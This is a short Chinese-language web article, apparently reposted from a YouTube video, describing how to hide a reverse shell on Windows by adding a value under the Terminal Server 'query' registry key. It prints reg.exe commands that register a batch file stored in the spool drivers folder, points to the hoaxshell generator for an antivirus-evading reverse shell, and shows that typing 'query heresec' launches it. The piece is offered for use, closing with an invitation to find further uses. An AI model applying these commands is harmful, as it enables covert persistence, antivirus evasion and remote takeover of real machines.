网站首页

人工智能P2P分享搜索全网发布信息网站地图标签大全

当前位置:诺佳网 > 电子/半导体 > 嵌入式技术 >

用一条命令来隐藏反向Shell

时间:2023-07-05 09:32

人气:

作者:admin

标签: 服务器  Shell 

导读:执行命令query可以查看服务器的一些状态,实际上是执行此项值中的可执行文件。...

From:https://www.youtube.com/watch?v=gzv3d7rvjKA

注册表路径:

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerUtilitiesquery

包含了与终端服务器相关的设置和配置信息。

执行命令query可以查看服务器的一些状态,实际上是执行此项值中的可执行文件。

c58e25e2-1acb-11ee-962d-dac502259ad0.png

c5acff1c-1acb-11ee-962d-dac502259ad0.png

添加一条,打开计算器。

reg.exe add "HKLMSYSTEMCurrentControlSetControlTerminal ServerUtilitiesquery" /v heresec /t REG_MULTI_SZ /d 01hereseccalc.exe

c5cc27fc-1acb-11ee-962d-dac502259ad0.png

这里再介绍一个能够绕过一些AV的Windows反向shell生成器和交互程序。(测试环境用的X绒,可以绕过,经测试不能绕过Windows Defender的AMSI)。

https://github.com/t3l3machus/hoaxshell

c5eedc98-1acb-11ee-962d-dac502259ad0.png

将命令写入一个bat脚本中,然后添加注册表后执行。

c6327a48-1acb-11ee-962d-dac502259ad0.png

reg.exe add "HKLMSYSTEMCurrentControlSetControlTerminal ServerUtilitiesquery" /v heresec /t REG_MULTI_SZ /d 01heresecC:WindowsSystem32spooldriverscolor1.bat query heresec

只需执行命令query heresec即可运行反弹shell脚本。

c659cb66-1acb-11ee-962d-dac502259ad0.png

还能怎么用,再联想一下。

上一篇:

下一篇:

温馨提示:以上内容整理于网络,仅供参考,如果对您有帮助,留下您的阅读感言吧!
相关阅读
本类排行
相关标签
本类推荐
栏目热点
猜你喜欢

CPU | 内存 | 硬盘 | 显卡 | 显示器 | 主板 | 电源 | 键鼠 | 网站地图

Copyright © 2025-2035 诺佳网 版权所有 备案号:赣ICP备2025066733号
本站资料均来源互联网收集整理,作品版权归作者所有,如果侵犯了您的版权,请跟我们联系。

关注微信